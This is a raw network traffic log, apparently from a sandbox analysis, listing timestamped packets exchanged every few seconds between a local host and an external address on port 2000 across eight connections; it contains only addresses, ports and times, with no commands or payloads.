Dec 4, 2022 22:26:03.034156084 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:03.041969061 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:03.049119949 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:07.914453030 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:07.924684048 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:07.924921036 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:07.926146984 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:07.938096046 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:07.938749075 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:07.946332932 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:07.946928024 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:07.955178022 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:07.955826998 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:07.963424921 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:07.964541912 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:07.971811056 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:07.972445011 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:07.977808952 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:07.978414059 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:08.067065001 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:08.067517996 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:08.080975056 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:08.089926004 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:08.097848892 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:08.106607914 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:08.115839005 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:08.121691942 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:12.987370014 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:13.007189989 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:13.013099909 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:13.018352032 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:13.031553030 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:13.044203997 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:13.058490038 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:13.059659004 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:13.072983980 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:13.073018074 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:13.084495068 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:13.091202021 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:13.098459959 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:13.099390984 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:13.101011992 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:13.107009888 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:13.110877037 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:13.111449003 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:13.131481886 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:13.152288914 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:13.153079987 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:13.162693977 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:13.194663048 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:13.241813898 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:13.250843048 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:13.254682064 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:13.255371094 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:13.295809984 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:13.336775064 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:18.107250929 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:18.124686003 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:18.125926018 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:18.126553059 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:18.135474920 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:18.136058092 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:18.145483017 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:18.151393890 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:18.172909021 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:18.173703909 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:18.182188034 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:18.183319092 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:18.192050934 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:18.193327904 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:18.205116034 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:18.205863953 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:18.268831015 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:18.268889904 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:18.279647112 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:18.294935942 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:18.315995932 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:18.325501919 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:18.336920977 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:18.347579956 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:23.222404957 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:23.232777119 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:23.234402895 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:23.234970093 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:23.246304035 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:23.246926069 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:23.257534981 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:23.258232117 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:23.270909071 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:23.273387909 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:23.284275055 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:23.284813881 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:23.298357964 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:23.299034119 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:23.311814070 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:23.312349081 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:23.377423048 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:23.379612923 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:23.390397072 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:23.402509928 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:23.417815924 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:23.427460909 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:23.442569017 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:23.455528021 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:28.323340893 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:28.325031996 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:28.341475010 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:28.345905066 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:28.353244066 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:28.354579926 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:28.364258051 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:28.365197897 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:28.375298977 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:28.376943111 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:28.386862993 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:28.391385078 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:28.401990891 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:28.404103994 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:28.421735048 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:28.423191071 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:28.469588041 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:28.489353895 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:28.496329069 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:28.508439064 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:28.522674084 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:28.534275055 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:28.546477079 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:28.566313982 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:33.440293074 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:33.473651886 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:33.482098103 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:33.484579086 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:33.493621111 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:33.503727913 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:33.513837099 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:33.515093088 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:33.525209904 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:33.527079105 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:33.533593893 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:33.537231922 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:33.544038057 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:33.554040909 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:33.569050074 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:33.579046011 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:34.172322035 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:34.173449993 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:34.174537897 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:34.175148964 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:34.175623894 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:34.176104069 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:34.176558971 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:34.185292959 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:34.315890074 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:34.315948009 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:34.317274094 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:34.318068027 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:34.318103075 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:34.318583012 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:34.318614960 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:34.328289032 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:38.546224117 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:38.548988104 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:38.561518908 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:38.571039915 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:38.572277069 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:38.572730064 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:38.584489107 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:38.584994078 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:38.600507975 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:38.601015091 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:38.609491110 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:38.610038996 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:38.618280888 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:38.621632099 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:38.631371021 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:38.632000923 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:38.692847013 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:38.715095043 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:38.716988087 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:38.729069948 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:38.745395899 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:38.753892899 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:38.766123056 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:38.776844978 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:43.642699957 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:43.648742914 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:43.654737949 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:43.655534983 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:43.666400909 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:43.667526960 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:43.674433947 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:43.675467968 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:43.681756020 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:43.685540915 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:43.688985109 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:43.690057039 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:43.699258089 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:43.700622082 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:43.708914995 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:43.710304976 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:43.792381048 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:43.798846960 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:43.811096907 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:43.821022987 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:43.829144955 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:43.832950115 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:43.843960047 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:43.852924109 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:48.718485117 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:48.720021963 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:48.728378057 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:48.729249001 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:48.736062050 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:48.737054110 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:48.742849112 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:48.743616104 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:48.750327110 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:48.750926018 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:48.759143114 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:48.759768009 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:48.767210007 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:48.767901897 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:48.774135113 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:48.775851011 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:48.863099098 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:48.872844934 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:48.879905939 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:48.887803078 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:48.894529104 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:48.902863979 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:48.910120010 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:48.920305967 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:53.784198999 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:53.792690992 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:53.801238060 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:53.809648037 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:53.811919928 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:53.812453032 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:53.816921949 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:53.817508936 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:53.823147058 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:53.823765039 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:53.830387115 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:53.831151009 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:53.839263916 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:53.839764118 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:53.846049070 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:53.846538067 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:53.940026045 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:53.955718994 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:53.956651926 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:53.959681988 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:53.966448069 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:53.974749088 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:53.982918978 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:53.989775896 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:58.854425907 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:58.870264053 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:58.871601105 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:58.873956919 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:58.880955935 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:58.882524967 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:58.890043020 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:58.891432047 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:58.897102118 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:58.897711992 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:58.904594898 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:58.912636995 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:58.913147926 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:58.913290024 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:58.919565916 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:58.922261953 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:26:59.013721943 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:59.017821074 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:59.025984049 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:59.035799980 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:59.040855885 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:59.055880070 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:59.056983948 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:26:59.064960957 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:03.927269936 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:03.939834118 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:03.956475019 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:03.957268000 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:03.970632076 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:03.971725941 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:03.983509064 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:03.987437963 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:03.996546984 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:03.997277975 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:04.010351896 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:04.014182091 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:04.018553972 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:04.025907040 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:04.030067921 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:04.030603886 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:04.083767891 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:04.100532055 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:04.114598989 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:04.131946087 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:04.139813900 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:04.156440973 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:04.167654037 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:04.173873901 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:09.043742895 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:09.045376062 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:09.062906027 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:09.064165115 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:09.077651978 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:09.079106092 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:09.089178085 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:09.090568066 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:09.100533962 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:09.101675034 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:09.110481977 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:09.111318111 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:09.121674061 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:09.122375011 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:09.131025076 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:09.138763905 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:09.189301014 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:09.207473993 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:09.222532988 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:09.233619928 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:09.246681929 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:09.253863096 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:09.265786886 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:09.282553911 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:14.140465975 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:14.150793076 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:27:14.151905060 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:14.152137995 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:27:14.164197922 CET	2000	49711	86.48.24.91	192.168.2.3
